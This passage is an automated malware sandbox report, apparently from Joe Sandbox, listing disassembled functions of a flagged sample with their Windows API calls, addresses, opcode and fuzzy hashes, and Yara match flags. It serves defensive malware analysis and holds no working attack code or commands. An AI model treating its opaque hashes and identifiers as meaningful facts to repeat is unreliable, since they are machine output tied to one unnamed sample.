                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,004307D5,?,0043BA42,00000000,?,?,?), ref: 0043B35F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  • Opcode ID: f5690584e9ad499021b42ce56d8f8de17484a935533950cab043c7ceb3897eb3
                                                  • Instruction ID: db3c9ccc80d1476fb6d66557201e2f3895761b13365cb69cd331a803ccf2be29
                                                  • Opcode Fuzzy Hash: f5690584e9ad499021b42ce56d8f8de17484a935533950cab043c7ceb3897eb3
                                                  • Instruction Fuzzy Hash: C911063B6007019FDB189F39C8917BAB791FF88318F15442EEA8687B40D375A902C784
                                                  Function 0304B554 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,03040A3C,?,0304BCA9,00000000,?,?,?), ref: 0304B5C6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  • Opcode ID: cce71207e2b51a43ae620771f06a8e25d222029b64e0dc1c2990edcd69b9ccff
                                                  • Instruction ID: 66f08433ea878c41469d9db0d59dcf54aa08bacc09ae5d2b24dd4e76e48c4e44
                                                  • Opcode Fuzzy Hash: cce71207e2b51a43ae620771f06a8e25d222029b64e0dc1c2990edcd69b9ccff
                                                  • Instruction Fuzzy Hash: 3611067A2007015FDB18DF3888A16BABB95FB80318B18443DD98687740D371E602C740
                                                  Function 0043B895 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B633,00000000,00000000,?), ref: 0043B8C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_free
                                                  • String ID:
                                                  • API String ID: 787680540-0
                                                  • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                  • Instruction ID: cee2b43c6a9fd0cc18a312a7fa4a4d5932635e218f943acbfed5d814f3d68c37
                                                  • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                  • Instruction Fuzzy Hash: 79F0F936A00215ABDB2C6A26DC067BB775CEF44754F15442AEE05A3240EB39BE4186D8
                                                  Function 0304BAFC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0304B89A,00000000,00000000,?), ref: 0304BB28
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_free
                                                  • String ID:
                                                  • API String ID: 787680540-0
                                                  • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                  • Instruction ID: efee4311a4cb76196a76d323e8bd0921bc5015d08f533d70f2f396b9dd5f9f8a
                                                  • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                  • Instruction Fuzzy Hash: AEF0F976A012157BDB24DA248C45BFAB798EB40714F080479EC85A3184EAB4FF01C6D4
                                                  Function 0304B8C2 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 030421C0
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421CD
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0304B920
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2955987475-0
                                                  • Opcode ID: b02de80145afd5f894115aac2fdb7f166548fa9ffbe0bf9dd33173edd63a3eb6
                                                  • Instruction ID: 26889ad115646b12d2a170ae9365560e60291f5edafbb5701bd6f372d6540574
                                                  • Opcode Fuzzy Hash: b02de80145afd5f894115aac2fdb7f166548fa9ffbe0bf9dd33173edd63a3eb6
                                                  • Instruction Fuzzy Hash: 9601F272B42215ABCB04EF38DC80AFA33A8DF45310B0441BAEA02DB281DA35DE058750
                                                  Function 0043B388 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,004307D5,?,0043BA06,004307D5,?,?,?,?,?,004307D5,?,?), ref: 0043B3D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  • Opcode ID: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                  • Instruction ID: 8e36b55a9bc7705faaba13b87098130e4a65547030758f83ed228488c18c5ef1
                                                  • Opcode Fuzzy Hash: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                  • Instruction Fuzzy Hash: BCF0C2362003045FDB145F3A9C92B6A7B95EF88768F15852EFE468B650D7B59C02C684
                                                  Function 0304B5EF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • EnumSystemLocalesW.KERNEL32(0043B665,00000001,00000006,?,03040A3C,?,0304BC6D,03040A3C,?,?,?,?,?,03040A3C,?,?), ref: 0304B63B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  • Opcode ID: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                  • Instruction ID: 364ff5c75a026132d8d5cff985ca3921d365545962376eb2b28ff266c5281c89
                                                  • Opcode Fuzzy Hash: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                  • Instruction Fuzzy Hash: 8EF0227A3007041FDB249F399C81A6A7BD9EF80728F19447DEA458B690E675D9028604
                                                  Function 00434DED Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0042E40D: EnterCriticalSection.KERNEL32(?,?,00431C9A,?,00457A38,00000008,00431D68,?,?,?), ref: 0042E41C
                                                  • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00434E25
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                  • Instruction ID: 31781df083fb6f98b94d2300e169204e9eab98a1842135cb0ce39f8875023ccf
                                                  • Opcode Fuzzy Hash: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                  • Instruction Fuzzy Hash: 57F04F32A103009FD754EF69E906B8D77E0AB49726F10426AF910DB2E2CB7999848F49
                                                  Function 03045054 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0303E674: RtlEnterCriticalSection.NTDLL(02BC0DD4), ref: 0303E683
                                                  • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 0304508C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
                                                  • Instruction ID: 0497ef3047fa90ad9e937004891f3711514b17eadfee9a8ab8cbd2ac2305195a
                                                  • Opcode Fuzzy Hash: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
                                                  • Instruction Fuzzy Hash: 7BF03C36A11304DFE714EF68D905B9D7BA0AF46711F104266F910DF2E1CB759A50CB4A
                                                  Function 0043B2A2 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,0043BA64,004307D5,?,?,?,?,?,004307D5,?,?,?), ref: 0043B2D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  • Opcode ID: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                  • Instruction ID: 792a508546450a8c62dd781f30710cea9d26762123306e32df2f83f98e4bbb46
                                                  • Opcode Fuzzy Hash: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                  • Instruction Fuzzy Hash: 62F0203A30020497CB04AF7AD85A76BBF90EBC5B54F0A409AEF098B250C6399842C798
                                                  Function 0304B509 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,00000006,?,?,0304BCCB,03040A3C,?,?,?,?,?,03040A3C,?,?,?), ref: 0304B540
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                  • String ID:
                                                  • API String ID: 2016158738-0
                                                  • Opcode ID: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                  • Instruction ID: eb5a7b474624bec0485ce2a18d7a27bb4845fd3d7a138a4cbee1b5fcb5303e17
                                                  • Opcode Fuzzy Hash: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                  • Instruction Fuzzy Hash: CFF0553A30020457CB04EF3ADC0476ABF98EFC1B50F0A00A9EF098B250C231DA42C790
                                                  Function 00410686 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00010692,0040FC1E), ref: 0041068B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                  • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                  • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                  • Instruction Fuzzy Hash:
                                                  Function 030208ED Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00410692,0301FE85), ref: 030208F2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                  • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                  • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                  • Instruction Fuzzy Hash:
                                                  Function 0043BBE1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                  • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                  • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                  • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                  Function 004373F9 Relevance: .6, Instructions: 637COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                  • Instruction ID: b4093df590a21e34b028a8b1fc7d27a52c9cbab165512cb59d6a43ae298a81d2
                                                  • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                  • Instruction Fuzzy Hash: 61324661D68F014DE7339634C822336A698AFBB3D4F15E737F859B5EA6EB28C4834105
                                                  Function 004071D0 Relevance: .4, Instructions: 378COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                  • Instruction ID: 8d7dcf63c468df939a74f501716ec15b8f2183c69ee07cfca9113f75d84f5853
                                                  • Opcode Fuzzy Hash: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                  • Instruction Fuzzy Hash: C3E19270A08612EFD714CF24C590AAAB7F1FF44304B14456ED856ABB81D738FC61DB96
                                                  Function 0303770B Relevance: .4, Instructions: 356COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                  • Instruction ID: 697686d0592eb50160a8f046669d0ce80fa99bd570fb0182f56766996f033e1e
                                                  • Opcode Fuzzy Hash: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                  • Instruction Fuzzy Hash: 09D1D8B210A5A34ECBADCA39847003AFFE96A4356131E47DEE4F7CB5C2ED24D154D660
                                                  Function 00427D87 Relevance: .3, Instructions: 254COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction ID: 80968e5e8bc017810328c9ff139e3a08396a4cd6bf5f0c598f5f88a651707172
                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction Fuzzy Hash: C691743230D0B34ADB29463DA53413FFFE15E523A139A079FE4F2CA2C5EE289954D624
                                                  Function 03037FEE Relevance: .3, Instructions: 254COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction ID: 81da1fb7956e68a5cad314f19e4679efa661c954a3e13c308610dbb1f4ed7180
                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction Fuzzy Hash: 2391567220A1A34ADBAD863E847407EFFE95A432A131D4BDDF4F2CB5C5EE24D1589620
                                                  Function 00428042 Relevance: .2, Instructions: 244COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                  • Instruction ID: 6d209accfb2b0f61ed35da4827d98296029fd821660f9634528c43e98a7d9207
                                                  • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                  • Instruction Fuzzy Hash: D491933230A0B34ADB69423D947403FFFE15A523A135A079FD4F2CA2C5EE189569E638
                                                  Function 030382A9 Relevance: .2, Instructions: 244COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                  • Instruction ID: 457a7431fe9f72efb553c6ec2e66170a55dca90e41c1b2b66686fac0675360e6
                                                  • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                  • Instruction Fuzzy Hash: 0A91217210A0A34EDBA9C63A857403EFFE95A431A131E4BDDF4F6CB5C5EE24D168D620
                                                  Function 00427AC0 Relevance: .2, Instructions: 240COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction ID: c950a799e81b9798c69e1fde7feb5263e7a66bddbd8f12dc999fd4da67e98d8e
                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction Fuzzy Hash: 02915F7230D0B34ADB29463EA47403EFFE15A523A539A079FD4F2CB2C1EE189665D624
                                                  Function 03037D27 Relevance: .2, Instructions: 240COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction ID: eab01ca7d0688043ec162e6e21c41ed66a2149628dd6ecd240d918be47113f24
                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction Fuzzy Hash: 4D9164B220B0A34EDBADC639857453EFFF95A439A131E0B9ED4F2CB1C5EE14C5549620
                                                  Function 0042D50E Relevance: .2, Instructions: 237COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae41838ee76994b482650b7261a05257237b420b1ccb6a01709a4d1c62f7e11e
                                                  • Instruction ID: bf5b32470415164d0bde1c399ad2a9f6c2d5fa579297b3e458aa86cae917bf69
                                                  • Opcode Fuzzy Hash: ae41838ee76994b482650b7261a05257237b420b1ccb6a01709a4d1c62f7e11e
                                                  • Instruction Fuzzy Hash: 5F6132A1F0073866DB389A287895BBF23949F42748FE0051BE846DB3C1D69D9DC2C75E
                                                  Function 0303D775 Relevance: .2, Instructions: 237COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                  • Instruction ID: 18f072b92bc2c8aab5cf26f04613ef0ba1b1ba6c588b56d10302d5094c0eb2d8
                                                  • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                  • Instruction Fuzzy Hash: 3561367561370967DB74DB2C8890BFFA3EEEF83604F0C085AD982DF2A0E615A942C355
                                                  Function 00427816 Relevance: .2, Instructions: 232COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
